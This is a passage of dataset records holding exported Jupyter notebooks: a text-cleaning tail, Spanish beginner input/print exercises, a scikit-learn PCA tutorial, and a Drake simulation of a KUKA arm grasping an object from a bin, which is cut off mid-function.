pd.merge(unprocessed_df, processed_df, on='Unnamed: 0', how='left')\n\ndf_clean\n\n# #Everything seems correct! Now we drop the column Unnamed: 0 can \n# df_clean = df_clean.drop(['Unnamed: 0'], axis=1)\n#save the df_clean\ndf_clean.to_csv('Master Thesis Data\\\\df_clean.csv', index=False)\n\nend_time = time.time()\ntotal_time = end_time - start_time\nprint(\"Total execution time: {:.2f} seconds\".format(total_time))\n","repo_name":"peterthebest444/Chatbot-Overflow---Piotr-Piwnik","sub_path":"Notebooks/Thesis_Code_2_Text_Cleaning.ipynb","file_name":"Thesis_Code_2_Text_Cleaning.ipynb","file_ext":"py","file_size_in_byte":10753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"19853696185","text":"# + [markdown] id=\"5W3-5u8iMWxf\" colab_type=\"text\"\n# Punto Nº1:\n#\n# Realize un programa que permita ingresar por teclado 2 valores ('a' y 'b') y que se imprima por pantalla con el siguiente formato:\n#\n# \"Los valores ingresados fueron a y b\" ---> reemplazando a y b por sus valores ingresados\n#\n# Punto Nº2:\n#\n# Realize un programa que permita ingresar por teclado 2 valores enteros ('a' y 'b') y que se imprima por pantalla la suma con el siguiente formato:\n#\n# \"Los valores ingresados fueron 4 y 5, y la suma es: 9 \" ---> ( para el caso de que a=4 y b=5)\n#\n# Punto Nº3:\n#\n# Realize un programa que permita ingresar por teclado 3 valores enteros (a,b y c) e imprima por pantalla el valor mas grande con el siguiente formato:\n#\n# \"Los valores ingresados fueron 4 y 5 y 8, y el mayor fue: 8 \" --> (para el caso de que a=4, b=5 y c= 8)\n\n# + id=\"idCZ_a0cI5_R\" colab_type=\"code\" colab={}\n#Ejercicio N°1\na = input('Ingrese un valor para a ')\nb = input('Ingrese un valor para b ')\nprint('Los valores ingresados fueron '+ a +' y '+ b)\n\n# + id=\"vMANvXmSqqhl\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 231} outputId=\"9563d063-ec0a-4e35-8e39-310e120773f4\"\n#Ejercicio N2\na = int(input('Ingrese un valor entero para a '))\nb = int(input('Ingrese un valor entero para b '))\nprint('Los valores ingresados fueron ',a,' y ',b,',y la suma es: ',a+b)\n\n\n# + id=\"ipamc3ZZs8CD\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 85} outputId=\"d94f9e0f-df10-477b-ef82-5a1a5b8c5446\"\n#Ejercicio N2 (Que no se cierra cuando ingresas un valor que no es entero)\na = float(input('Ingrese un valor entero para a: '))\nc = a%1\nwhile(c!=0):\n a = float(input('No se ingresó un valor entero para a, vuelva a ingresar otro valor para a: '))\n c = a%1\na = int(a)\nb = float(input('Ingrese un valor entero para b: '))\nd = b%1\nwhile(d!=0):\n b = float(input('No se ingresó un valor entero para b, vuelva a ingresar otro valor para b: '))\n d = b%1\nb = int(b)\ne = a+b\nprint('Los valores ingresados fueron ',a,'y',b,',y la suma es:',e)\n\n# + id=\"hPRJC5jBrZaX\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 85} outputId=\"8f3e6a78-e5be-40c6-88a7-f86a20d556d4\"\n#Ejercicio N3\na = float(input('Ingrese un valor entero para a: '))\nd = a%1\nwhile(d!=0):\n a = float(input('No se ingresó un valor entero para a, vuelva a ingresar otro valor para a: '))\n d = a%1\na = int(a)\nmax = a\nb = float(input('Ingrese un valor entero para b: '))\ne = b%1\nwhile(e!=0):\n b = float(input('No se ingresó un valor entero para b, vuelva a ingresar otro valor para b: '))\n e = b%1\nb = int(b)\nif (b>max):\n max = b\nc = float(input('Ingrese un valor entero 
para c: '))\nf = c%1\nwhile(f!=0):\n c = float(input('No se ingresó un valor entero para c, vuelva a ingresar otro valor para c: '))\n f = c%1\nc = int(c)\nif (c>max):\n max = c\nprint('Los valores ingresados fueron ',a,'y',b,'y',c,',y el mayor fue:',max)\n","repo_name":"josemanuelpiro97/curso_Python","sub_path":"Constantino_Aiassa/Tarea_N1.ipynb","file_name":"Tarea_N1.ipynb","file_ext":"py","file_size_in_byte":2929,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"28002906005","text":"# # Principal Component Analysis (PCA)\n\n# %matplotlib inline\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns; sns.set()\n\n# ## PCA on two-dimensional (2D) data\n# It will be easy to show what PCA does by using a 2D dataset.\n# Consider the following 200 points:\n\nrng = np.random.RandomState(1)\nX = np.dot(rng.rand(2, 2), rng.randn(2, 200)).T\nfig, ax = plt.subplots()\nax.plot(X[:, 0], X[:, 1],'.')\nax.axis('equal')\nax.set_title('200 data points in 2D space', fontsize=16)\n#each row of X is a data point\n\nprint(X)\n\n# It seems that the data points are spread out along a principal direction.
\n# What is that principal direction/axis?
\n# Now, let's use Scikit-Learn's ``PCA`` to find out ...\n\nfrom sklearn.decomposition import PCA\npca = PCA(n_components=2, whiten=False)\npca.fit(X)\n\n# The line `pca.fit(X)` hides all of the details of the algorithm
\n# It basically follows these three algorithm steps:
\n# (1) Estimate the mean 𝜇 and covariance matrix C
\n# (2) Compute the eigenvectors 𝑤_1, 𝑤_2, … of 𝐶, corresponding to the largest eigenvalue 𝜆_1, the second largest eigenvalue 𝜆_2, …
\n# (3) Compute the reduced representation of data (a minimal numpy sketch of these three steps is shown below)\n\n# There are many attributes of pca
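\n\n# A quick illustration (added sketch, assuming X and np from the cells above): the three steps can be reproduced by hand with plain numpy; eigh is used because the covariance matrix is symmetric\nmu_hand = X.mean(axis=0)                            # step (1): sample mean\nC_hand = np.cov(X, rowvar=False)                    # step (1): sample covariance matrix\nlam_hand, W_hand = np.linalg.eigh(C_hand)           # step (2): eigenvalues/eigenvectors, ascending order\nlam_hand, W_hand = lam_hand[::-1], W_hand[:, ::-1]  # reorder so the largest eigenvalue comes first\nbeta_hand = (X - mu_hand) @ W_hand                  # step (3): reduced representation (scores)\nprint(lam_hand)  # should match pca.explained_variance_ up to the N vs N-1 normalization; columns of W_hand match rows of pca.components_ up to sign\n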
\n# https://scikit-learn.org/stable/modules/generated/sklearn.decomposition.PCA.html
\n# For example, `pca.explained_variance_` - what does it mean ? \n\n# `pca.mean_` stores the sample mean 𝜇 \n\npca.mean_ \n\n# `pca.get_covariance()` returns the covariance matrix C
\n# note: if you construct the PCA with whiten=True instead (i.e. PCA(n_components=2, whiten=True)), get_covariance() no longer returns the sample covariance matrix of X\n\nC=pca.get_covariance()\nC\n\nfrom numpy.linalg import eig\neig(C) # each column is an eigenvector\n\n# `pca.components_` stores the eigenvectors
\n# shape (n_components, n_features)\n\npca.components_\n\n# `pca.explained_variance_` stores the eigenvalues of the covariance matrix C
\n# shape (n_components,)\n\npca.explained_variance_\n\n# `pca.singular_values_` stores the singular values of the mean-centered X from SVD\n\npca.singular_values_\n\nfrom numpy.linalg import svd\nsvd(X)\n\n# Relationship between `pca.singular_values_` and `pca.explained_variance_`
\n# see \"Singular Value Decomposition (SVD) and Eigen Decomposition\" in lecture notes\n\npca.explained_variance_*X.shape[0] # X.shape[0] is the number of data points\n\npca.singular_values_**2\n\n\n# To 'see' what these numbers mean, let's visualize them as vectors over the input data, using the \"components\" to define the direction of the vector, and the \"explained variance\" to define the squared-length of the vector:\n\n# +\ndef draw_vector(v0, v1, ax=None):\n ax = ax or plt.gca()\n arrowprops=dict(arrowstyle='->', linewidth=2, color ='k',\n shrinkA=0, shrinkB=0)\n ax.annotate('', v1, v0, arrowprops=arrowprops)\n\n# plot data\nplt.plot(X[:, 0], X[:, 1], '.')\nfor length, vector in zip(pca.explained_variance_, pca.components_):\n v = vector * 3 * np.sqrt(length)\n draw_vector(pca.mean_, pca.mean_ + v)\nplt.axis('equal');\n# -\n\n# These vectors represent the *principal axes/directions* of the data, and the length of the vector is an indication of how \"important\" that axis is in describing the distribution of the data—more precisely, it is a measure of the variance of the data when projected onto that axis.\n# The projection of each data point onto the principal axes are the \"principal components\" of the data.
\n# We use `pca.transform(X)` to compute the principal components of each data point\n\nBeta = pca.transform(X)\nBeta[0,:]\n\nnp.sum(pca.components_[0,:]*(X[0,:]-pca.mean_))\n\nnp.sum(pca.components_[1,:]*(X[0,:]-pca.mean_))\n\n# The PCA parameter `whiten` is False by default, and then `pca.transform(X)` does not perform normalization by eigenvalues
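\n\n# As a quick sanity check (using only the X and pca defined above; Beta_check is a new illustrative name): with whiten=False, pca.transform(X) is just the centered data projected onto the eigenvectors\nBeta_check = (X - pca.mean_) @ pca.components_.T\nnp.allclose(Beta_check, pca.transform(X))  # expected: True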
\n\nBeta = pca.transform(X) # Beta[0,:] is beta0 in lecture notes\nY = Beta/ np.sqrt(pca.explained_variance_) \nY[0,:] # It is y0 in lecture notes\n\nnp.sum(pca.components_[0,:]*(X[0,:]-pca.mean_))/np.sqrt(pca.explained_variance_[0])\n\nnp.sum(pca.components_[1,:]*(X[0,:]-pca.mean_))/np.sqrt(pca.explained_variance_[1])\n\n# Now, we can show the original data points X and the transformed data points Y\n\nfig, ax = plt.subplots(1, 2, figsize=(16, 6))\nfig.subplots_adjust(left=0.0625, right=0.95, wspace=0.1)\n# plot data\nax[0].plot(X[:, 0], X[:, 1], '.')\nfor length, vector in zip(pca.explained_variance_, pca.components_):\n v = vector * 3 * np.sqrt(length)\n draw_vector(pca.mean_, pca.mean_ + v, ax=ax[0])\nax[0].axis('equal');\nax[0].set(xlabel='x1', ylabel='x2')\nax[0].set_title('original data X', fontsize=20)\n# plot principal components\nax[1].plot(Y[:, 0], Y[:, 1], '.')\ndraw_vector([0, 0], [0, 3], ax=ax[1])\ndraw_vector([0, 0], [3, 0], ax=ax[1])\nax[1].axis('equal')\nax[1].set(xlabel='component 1', ylabel='component 2',\n xlim=(-3.5, 3.5), ylim=(-3.5, 3.5))\nax[1].set_title('transformed data Y - principal components of X', fontsize=20)\n\n# This transformation from data axes to principal axes is an *affine transformation*, which basically means it is composed of a translation, rotation, and uniform scaling.\n#\n# Thus, PCA is a linear transform\n\n# #### Let's set `whiten=True` to directly get y\n\npca_w = PCA(n_components=2, whiten=True)\npca_w.fit(X)\nY_w = pca_w.transform(X) # Y_w[0,:] is y0 in lecture notes\n\nY[0,:]\n\nY_w[0,:]\n\nY[1,:]\n\nY_w[1,:]\n\n#this is weird, not the original covariance matrix\n#see the code https://github.com/scikit-learn/scikit-learn/blob/b194674c4/sklearn/decomposition/_base.py#L26\nC_w=pca_w.get_covariance()\nC_w\n\nC\n\n# ### PCA as dimensionality reduction\n#\n# The data X is in 2D space, i.e., each row is a data point that has two numbers
\n# The transformed data Y is still in 2D space.
\n# Now, we only select the first principal component for each data point
\n\nY0 = Y[:,0].reshape(-1,1)\nprint(\"original shape: \", X.shape)\nprint(\"transformed shape:\", Y0.shape)\n\n# We can start from the beginning by setting n_components to 1 \n\npca1 = PCA(n_components=1, whiten=True)#set whiten=True, we get y from the pca (forward) transform\npca1.fit(X)\nY1d = pca1.transform(X)\nprint(\"original shape: \", X.shape)\nprint(\"transformed shape:\", Y1d.shape)\n\n# The transformed data has been reduced to a single dimension.\n# To understand the effect of this dimensionality reduction, we can perform the inverse transform of this reduced data `Y1d` to obtain a reconstructed version `X_rec` of the original data `X`\n\nX_rec = pca1.inverse_transform(Y1d)\nfig, ax = plt.subplots()\nax.plot(X[:, 0], X[:, 1], 'b.')\nax.plot(X_rec[:, 0], X_rec[:, 1], 'r.')\nax.axis('equal')\n\n# The blue points are the original data, while the red points are the projected version.\n# This makes clear what a PCA dimensionality reduction means: the information along the least important principal axis or axes is removed, leaving only the component(s) of the data with the highest variance.\n# The fraction of variance that is cut out (proportional to the spread of points about the line formed in this figure) is roughly a measure of how much \"information\" is discarded in this reduction of dimensionality.\n#\n# This reduced-dimension dataset is in some senses \"good enough\" to encode the most important relationships between the points: the overall relationship between the data points are mostly preserved.\n","repo_name":"jshudak/Python","sub_path":"CSC546/hw2s/PCA.ipynb","file_name":"PCA.ipynb","file_ext":"py","file_size_in_byte":7210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"5000597894","text":"# + [markdown] id=\"view-in-github\" colab_type=\"text\"\n# \"Open\n\n# + id=\"sXAaoUZHGM6e\" colab={\"base_uri\": \"https://localhost:8080/\"} outputId=\"b54b8339-d1f9-4eaa-8b65-1b486ecd4281\"\nimport importlib\nimport os, sys\nfrom urllib.request import urlretrieve\n\nif 'google.colab' in sys.modules and importlib.util.find_spec('manipulation') is None:\n urlretrieve(f\"http://manipulation.csail.mit.edu/scripts/setup/setup_manipulation_colab.py\",\n \"setup_manipulation_colab.py\")\n from setup_manipulation_colab import setup_manipulation\n setup_manipulation(manipulation_sha='47a354700b3bc48861400bbe4eb16ad54cf08c05', drake_version='20201101', drake_build='nightly')\n\nfrom IPython import get_ipython\nrunning_as_notebook = get_ipython() and hasattr(get_ipython(), 'kernel')\n\n# setup ngrok server\nserver_args = []\nif 'google.colab' in sys.modules:\n server_args = ['--ngrok_http_tunnel']\n\n# start a single meshcat server instance to use for remainder of this notebook.\nfrom meshcat.servers.zmqserver import start_zmq_server_as_subprocess\nproc, zmq_url, web_url = start_zmq_server_as_subprocess(server_args=server_args)\n\nimport numpy as np\nfrom IPython.display import display, HTML\nfrom pydrake.examples.manipulation_station import ManipulationStation\n\nimport matplotlib.pyplot as plt, mpld3\nif running_as_notebook:\n mpld3.enable_notebook()\n\nimport pydrake\nfrom pydrake.all import (\n DiagramBuilder, ConnectMeshcatVisualizer, Simulator, FindResourceOrThrow,\n Parser, MultibodyPlant, RigidTransform, LeafSystem, BasicVector,\n JacobianWrtVariable, RollPitchYaw, SignalLogger, AddTriad,\n PiecewisePolynomial, PiecewiseQuaternionSlerp, RotationMatrix, Solve,\n TrajectorySource\n)\n\nfrom pydrake.multibody import 
inverse_kinematics\nfrom pydrake.all import SnoptSolver, IpoptSolver\nfrom pydrake.trajectories import PiecewisePolynomial\n#########################\n# Imports from clutter generation notebook\nimport numpy as np\nfrom IPython.display import display, HTML\nfrom ipywidgets import Textarea\n\nfrom pydrake.all import ( \n AddMultibodyPlantSceneGraph, ConnectMeshcatVisualizer, \n DiagramBuilder, RigidTransform, RotationMatrix, Box, \n CoulombFriction, FindResourceOrThrow, FixedOffsetFrame, \n GeometryInstance, MeshcatContactVisualizer, Parser, PlanarJoint, \n JointIndex, Simulator, ProcessModelDirectives, LoadModelDirectives\n)\n\nfrom functools import partial\nimport open3d as o3d\nimport matplotlib.pyplot as plt\nfrom IPython.display import display, HTML\nimport meshcat\nimport meshcat.geometry as g\nimport meshcat.transformations as tf\n\nfrom pydrake.all import (\n ConnectPlanarSceneGraphVisualizer,\n ConnectDrakeVisualizer, DepthCameraProperties, RgbdSensor,\n RandomGenerator, UniformlyRandomRotationMatrix, RollPitchYaw,\n MakeRenderEngineVtk, RenderEngineVtkParams, Role, UnitInertia, set_log_level\n)\n\nfrom ipywidgets import Dropdown, FloatSlider, Layout\nfrom pydrake.all import (\n Sphere, Cylinder, Box, Capsule, Ellipsoid, SpatialInertia)\n\nimport pydrake\n\n#from pydrake.multibody.jupyter_widgets import MakeJointSlidersThatPublishOnCallback\nfrom manipulation.jupyter_widgets import MakeJointSlidersThatPublishOnCallback\nfrom manipulation.meshcat_utils import draw_open3d_point_cloud, draw_points\nfrom manipulation.open3d_utils import create_open3d_point_cloud\nfrom manipulation.mustard_depth_camera_example import MustardExampleSystem\nfrom manipulation.scenarios import AddRgbdSensors\nfrom manipulation.utils import FindResource\n\nset_log_level(\"warn\");\n\nycb = [(\"cracker\", \"003_cracker_box.sdf\"), \n (\"sugar\", \"004_sugar_box.sdf\"), \n (\"soup\", \"005_tomato_soup_can.sdf\"), \n (\"mustard\", \"006_mustard_bottle.sdf\"), \n (\"gelatin\", \"009_gelatin_box.sdf\"), \n (\"meat\", \"010_potted_meat_can.sdf\")]\n\n#########################\n\ndef setup_manipulation_station():\n builder = DiagramBuilder()\n station = builder.AddSystem(ManipulationStation(time_step=1e-3)) #station.SetupManipulationClassStation() #station.SetupClutterClearingStation()\n\n plant = station.get_multibody_plant()\n parser = Parser(plant, station.get_mutable_scene_graph())\n parser.AddModelFromFile(FindResourceOrThrow(\n \"drake/examples/manipulation_station/models/bin.sdf\"))\n plant.WeldFrames(A = plant.world_frame(), \n B = plant.GetFrameByName(\"bin_base\"),\n X_AB = RigidTransform.Identity())\n table = parser.AddModelFromFile(FindResourceOrThrow(\"drake/examples/manipulation_station/models/bin.sdf\"), \"table\")\n plant.WeldFrames(plant.world_frame(), plant.GetFrameByName(\"bin_base\", table), RigidTransform(rpy=RollPitchYaw([np.pi, 0, 0]), p=[-.5, -.6, .2]))\n\n iiwa_model_file = FindResourceOrThrow(\n \"drake/manipulation/models/iiwa_description/iiwa7/\"\n \"iiwa7_no_collision.sdf\")\n iiwa = parser.AddModelFromFile(iiwa_model_file, \"iiwa\")\n X_WI = RigidTransform(rpy=RollPitchYaw([0, 0, np.pi/2]), p=np.array([-0.5, 0, 0])) #.Identity()\n plant.WeldFrames(plant.world_frame(),\n plant.GetFrameByName(\"iiwa_link_0\", iiwa),\n X_WI)\n wsg_model_file = FindResourceOrThrow(\n \"drake/manipulation/models/wsg_50_description/sdf/\"\n \"schunk_wsg_50.sdf\")\n wsg = parser.AddModelFromFile(wsg_model_file, \"gripper\")\n X_7G = RigidTransform(rpy=RollPitchYaw([np.pi/2, 0, np.pi/2]), p=[0, 0, 
0.114])#RigidTransform.Identity()\n plant.WeldFrames(\n plant.GetFrameByName(\"iiwa_link_7\", iiwa),\n plant.GetFrameByName(\"body\", wsg),\n X_7G)\n\n station.RegisterIiwaControllerModel(\n iiwa_model_file, iiwa, plant.world_frame(),\n plant.GetFrameByName(\"iiwa_link_0\", iiwa), X_WI)\n station.RegisterWsgControllerModel(\n wsg_model_file, wsg,\n plant.GetFrameByName(\"iiwa_link_7\", iiwa),\n plant.GetFrameByName(\"body\", wsg), X_7G)\n \n i = 2\n object_num = i\n sdf = FindResourceOrThrow(\"drake/manipulation/models/ycb/sdf/\" + ycb[object_num][1])\n parser.AddModelFromFile(sdf, f\"object{i}\")\n\n station.Finalize()\n\n frames_to_draw = {\"gripper\": {\"body\"}}\n meshcat = ConnectMeshcatVisualizer(builder,\n station.get_scene_graph(),\n output_port=station.GetOutputPort(\"pose_bundle\"),\n delete_prefix_on_load=False,\n frames_to_draw=frames_to_draw,\n zmq_url=zmq_url)\n \n diagram = builder.Build()\n \n context = plant.CreateDefaultContext()\n gripper = plant.GetBodyByName(\"body\")\n \n initial_pose = plant.EvalBodyPoseInWorld(context, gripper)\n\n simulator = Simulator(diagram)\n context = simulator.get_mutable_context()\n plant_context = plant.GetMyContextFromRoot(context)\n\n for body_index in plant.GetFloatingBaseBodies():\n #tf = RigidTransform(rpy=RollPitchYaw([0, 0, 0]), p=[0,0,0.05])\n theta = np.random.rand() * 2 * np.pi\n tf = tf = RigidTransform(\n RotationMatrix(pydrake.common.eigen_geometry.AngleAxis_(theta, np.array([0, 0, 1]))), \n [np.random.uniform(-.1,.1), np.random.uniform(-.15, .15), .07])\n plant.SetFreeBodyPose(plant_context, \n plant.get_body(body_index),\n tf)\n\n simulator.set_target_realtime_rate(1.0)\n #simulator.AdvanceTo(0.01)\n simulator.AdvanceTo(1.)\n for body_index in plant.GetFloatingBaseBodies():\n final_pose = plant.GetFreeBodyPose(plant_context, plant.get_body(body_index))\n return initial_pose, meshcat, final_pose\n\n# Get initial pose of the gripper by using default context of manip station.\ninitial_pose, meshcat, final_pose = setup_manipulation_station()\n\n# Helper function to visualize triad given a rigid transform. \ndef visualize_transform(name, transform, prefix='', length=0.15, radius=0.006):\n # Support RigidTransform as well as 4x4 homogeneous matrix.\n if isinstance(transform, RigidTransform):\n transform = transform.GetAsMatrix4()\n AddTriad(meshcat.vis, name=name, prefix=prefix, length=length, radius=0.005, opacity=0.2)\n meshcat.vis[prefix][name].set_transform(transform)\n\np_WAbove = np.array([0, 0, .5]) # Position above bin. Pre/post-grasp pose.\np_WFinal = np.array([-.5, -.6, .5]) # Position above table\n\n# Interpolate pose for opening doors. 
\ndef InterpolatePoseOpen(t):\n angle_start, angle_end = 0, np.pi/2\n theta = angle_start + (angle_end - angle_start) * t\n p_WG = np.array([np.cos(theta)*.5, np.sin(theta)*-.6, np.sin(theta)*-.2]) + np.array([-.5, 0, .5])\n TEMP = RollPitchYaw(0, np.pi/2 - theta, -theta).ToRotationMatrix()\n R_WG = TEMP.multiply(RollPitchYaw(0, np.pi, 3*np.pi/2).ToRotationMatrix())\n\n X_WG = RigidTransform(R_WG, p_WG)\n\n return X_WG\n\n## Interpolate Pose for entry.\ndef make_gripper_orientation_trajectory():\n traj = PiecewiseQuaternionSlerp()\n traj.Append(0.0, initial_pose.rotation())\n traj.Append(5.0, InterpolatePoseOpen(0.0).rotation())\n return traj \n\ndef make_gripper_position_trajectory():\n traj = PiecewisePolynomial.FirstOrderHold(\n [0.0, 5.0], \n np.vstack([[initial_pose.translation()],\n [InterpolatePoseOpen(0.0).translation()]]).T)\n return traj\n\nentry_traj_rotation = make_gripper_orientation_trajectory()\nentry_traj_translation = make_gripper_position_trajectory()\n\ndef InterpolatePoseEntry(t):\n return RigidTransform(RotationMatrix(entry_traj_rotation.value(t)), \n entry_traj_translation.value(t))\n\ndef GenerateTrajectory(start, end, initialpose, goalpose):\n traj_translation = PiecewisePolynomial.FirstOrderHold(\n [start, end],\n np.vstack([[initialpose.translation()], [goalpose.translation()]]).T\n )\n traj_rotation = PiecewiseQuaternionSlerp()\n traj_rotation.Append(start, initialpose.rotation())\n traj_rotation.Append(end, goalpose.rotation())\n return traj_translation, traj_rotation\n\ndef GenerateInterpolation(start, end, initialpose, goalpose):\n '''\n Given start/end times and poses, interpolates between them and creates a function to access the interpolated poses at various times\n '''\n traj_t, traj_r = GenerateTrajectory(start, end, initialpose, goalpose)\n def InterpolatePoseFxn(t):\n return RigidTransform(RotationMatrix(traj_r.value(t)), traj_t.value(t))\n return InterpolatePoseFxn\n\n# Generate interpolation functions\n# Initial pose -> elevated pose (to avoid hitting bin)\nelev_pose = RigidTransform(initial_pose.rotation(), initial_pose.translation() + np.array([0, .1, .3]))\nInterpolatePose_Init_Elev = GenerateInterpolation(0, 1., initial_pose, elev_pose)\n# Elevated pose -> pre-grasp pose\np, r = final_pose.translation(), final_pose.rotation().matrix()\nz_axis = r[:, 1].flatten()\ny_axis = np.array([0, 0, -1.])\nx_axis = np.cross(y_axis, z_axis)\nmat = np.vstack([x_axis, y_axis, z_axis]).transpose()\nrotmat = RotationMatrix(mat)\ntranslation = np.array([p[0], p[1], elev_pose.translation()[-1]])\npg_pose = RigidTransform(rotmat, translation)\nInterpolatePose_Elev_Pg = GenerateInterpolation(1., 2.5, elev_pose, pg_pose)\n# Pre-grasp pose -> grab object pose\ntranslation = np.array([p[0], p[1], p[2] + .09])\ngrab_pose = RigidTransform(rotmat, translation)\nInterpolatePose_Pg_Grab = GenerateInterpolation(2.5, 4, pg_pose, grab_pose)\n# Grab object pose -> pre-grasp pose\npost_grab_pose = InterpolatePoseOpen(0)\nInterpolatePose_Grab_Pg = GenerateInterpolation(6, 7, grab_pose, post_grab_pose)\n# Place pose -> move back pose\nback_pose = RigidTransform(InterpolatePoseOpen(1).rotation(), InterpolatePoseOpen(1).translation() + np.array([0, 0, .1]))\nInterpolatePose_Place_Back = GenerateInterpolation(12, 15, InterpolatePoseOpen(1), back_pose)\n# Move back pose -> pre-grasp pose\nInterpolatePose_Back_Pg = GenerateInterpolation(13, 15, back_pose, pg_pose)\n\n# Wrapper function for end-effector pose. 
Total time: 12 seconds.\ndef InterpolatePose(t):\n if t < 1.:\n return InterpolatePose_Init_Elev(t)\n elif (t >= 1.) and (t < 2.5):\n return InterpolatePose_Elev_Pg(t)\n elif (t >= 2.5) and (t < 4.):\n return InterpolatePose_Pg_Grab(t)\n elif (t >= 4.) and (t < 6.):\n return InterpolatePose_Pg_Grab(4.)\n elif (t >= 6.) and (t < 7.):\n return InterpolatePose_Grab_Pg(t)\n elif (t >= 7.) and (t < 11.):\n return InterpolatePoseOpen((t - 7.) / 4.)\n elif (t >= 11.) and (t < 12):\n return InterpolatePoseOpen(1)\n else: #elif (t >= 12.) and (t < 15.):\n return InterpolatePose_Place_Back(t)\n ''' else:\n return InterpolatePose_Back_Pg(t) '''\n\n\n# Visualize our end-effector nominal trajectory. \nt_lst = np.linspace(0, 15, 30)\npose_lst = []\n\nvisualize_enabled = True\n\nfor t in t_lst:\n if visualize_enabled:\n visualize_transform(str(t), InterpolatePose(t))\n pose_lst.append(InterpolatePose(t))\n\n# Create gripper trajectory. \ngripper_t_lst = np.array([0., 5., 6., 11., 12., 15.])\ngripper_knots = np.array([0.05, 0.05, 0., 0., 0.05, 0.05]).reshape(1,6)\ng_traj = PiecewisePolynomial.FirstOrderHold(gripper_t_lst, gripper_knots)\n\ndef CreateIiwaControllerPlant():\n \"\"\"creates plant that includes only the robot and gripper, used for controllers.\"\"\"\n robot_sdf_path = FindResourceOrThrow(\n \"drake/manipulation/models/iiwa_description/iiwa7/iiwa7_no_collision.sdf\")\n gripper_sdf_path = FindResourceOrThrow(\n \"drake/manipulation/models/wsg_50_description/sdf/schunk_wsg_50_no_tip.sdf\")\n \n sim_timestep = 1e-3\n plant_robot = MultibodyPlant(sim_timestep)\n parser = Parser(plant=plant_robot)\n parser.AddModelFromFile(robot_sdf_path)\n parser.AddModelFromFile(gripper_sdf_path)\n plant_robot.WeldFrames(\n A=plant_robot.world_frame(),\n B=plant_robot.GetFrameByName(\"iiwa_link_0\"),\n X_AB=RigidTransform(rpy=RollPitchYaw([0, 0, np.pi/2]), p=np.array([-0.5, 0, 0]))\n )\n plant_robot.WeldFrames(\n A=plant_robot.GetFrameByName(\"iiwa_link_7\"),\n B=plant_robot.GetFrameByName(\"body\"),\n X_AB=RigidTransform(RollPitchYaw(np.pi/2, 0, np.pi/2), np.array([0, 0, 0.114]))\n )\n\n plant_robot.mutable_gravity_field().set_gravity_vector([0, 0, 0])\n plant_robot.Finalize()\n\n link_frame_indices = []\n for i in range(8):\n link_frame_indices.append(\n plant_robot.GetFrameByName(\"iiwa_link_\" + str(i)).index())\n\n return plant_robot, link_frame_indices\n\ndef BuildAndSimulateTrajectory(q_traj, g_traj):\n \"\"\"Simulate trajectory for manipulation station.\n @param q_traj: Trajectory class used to initialize TrajectorySource for joints.\n @param g_traj: Trajectory class used to initialize TrajectorySource for gripper.\n \"\"\"\n builder = DiagramBuilder()\n station = builder.AddSystem(ManipulationStation(time_step=1e-3))\n plant = station.get_multibody_plant()\n parser = Parser(plant, station.get_mutable_scene_graph())\n parser.AddModelFromFile(FindResourceOrThrow(\n \"drake/examples/manipulation_station/models/bin.sdf\"))\n plant.WeldFrames(A = plant.world_frame(), \n B = plant.GetFrameByName(\"bin_base\"),\n X_AB = RigidTransform.Identity())\n #bin = parser.AddModelFromFile(FindResource(\"models/shelves.sdf\"))\n #plant.WeldFrames(plant.world_frame(), plant.GetFrameByName(\"shelves_body\", bin), RigidTransform([0.6,0,0.4]))\n table = parser.AddModelFromFile(FindResourceOrThrow(\"drake/examples/manipulation_station/models/bin.sdf\"), \"table\")\n plant.WeldFrames(plant.world_frame(), plant.GetFrameByName(\"bin_base\", table), RigidTransform(rpy=RollPitchYaw([np.pi, 0, 0]), p=[-.5, -.6, .2]))\n\n 
iiwa_model_file = FindResourceOrThrow(\n \"drake/manipulation/models/iiwa_description/iiwa7/\"\n \"iiwa7_no_collision.sdf\")\n iiwa = parser.AddModelFromFile(iiwa_model_file, \"iiwa\")\n X_WI = RigidTransform(rpy=RollPitchYaw([0, 0, np.pi/2]), p=np.array([-0.5, 0, 0])) #.Identity()\n plant.WeldFrames(plant.world_frame(),\n plant.GetFrameByName(\"iiwa_link_0\", iiwa),\n X_WI)\n wsg_model_file = FindResourceOrThrow(\n \"drake/manipulation/models/wsg_50_description/sdf/\"\n \"schunk_wsg_50.sdf\")\n wsg = parser.AddModelFromFile(wsg_model_file, \"gripper\")\n X_7G = RigidTransform(rpy=RollPitchYaw([np.pi/2, 0, np.pi/2]), p=[0, 0, 0.114])#RigidTransform.Identity()\n plant.WeldFrames(\n plant.GetFrameByName(\"iiwa_link_7\", iiwa),\n plant.GetFrameByName(\"body\", wsg),\n X_7G)\n\n station.RegisterIiwaControllerModel(\n iiwa_model_file, iiwa, plant.world_frame(),\n plant.GetFrameByName(\"iiwa_link_0\", iiwa), X_WI)\n station.RegisterWsgControllerModel(\n wsg_model_file, wsg,\n plant.GetFrameByName(\"iiwa_link_7\", iiwa),\n plant.GetFrameByName(\"body\", wsg), X_7G)\n \n i = 2\n object_num = i\n sdf = FindResourceOrThrow(\"drake/manipulation/models/ycb/sdf/\" + ycb[object_num][1])\n parser.AddModelFromFile(sdf, f\"object{i}\")\n\n station.Finalize()\n\n q_traj_system = builder.AddSystem(TrajectorySource(q_traj))\n g_traj_system = builder.AddSystem(TrajectorySource(g_traj))\n\n meshcat = ConnectMeshcatVisualizer(builder,\n station.get_scene_graph(),\n output_port=station.GetOutputPort(\"pose_bundle\"),\n delete_prefix_on_load=True,\n frames_to_draw={\"gripper\":{\"body\"}},\n zmq_url=zmq_url)\n \n builder.Connect(q_traj_system.get_output_port(),\n station.GetInputPort(\"iiwa_position\"))\n builder.Connect(g_traj_system.get_output_port(),\n station.GetInputPort(\"wsg_position\"))\n \n diagram = builder.Build()\n\n simulator = Simulator(diagram)\n context = simulator.get_mutable_context()\n plant_context = plant.GetMyContextFromRoot(context)\n\n for body_index in plant.GetFloatingBaseBodies():\n tf = final_pose\n plant.SetFreeBodyPose(plant_context, \n 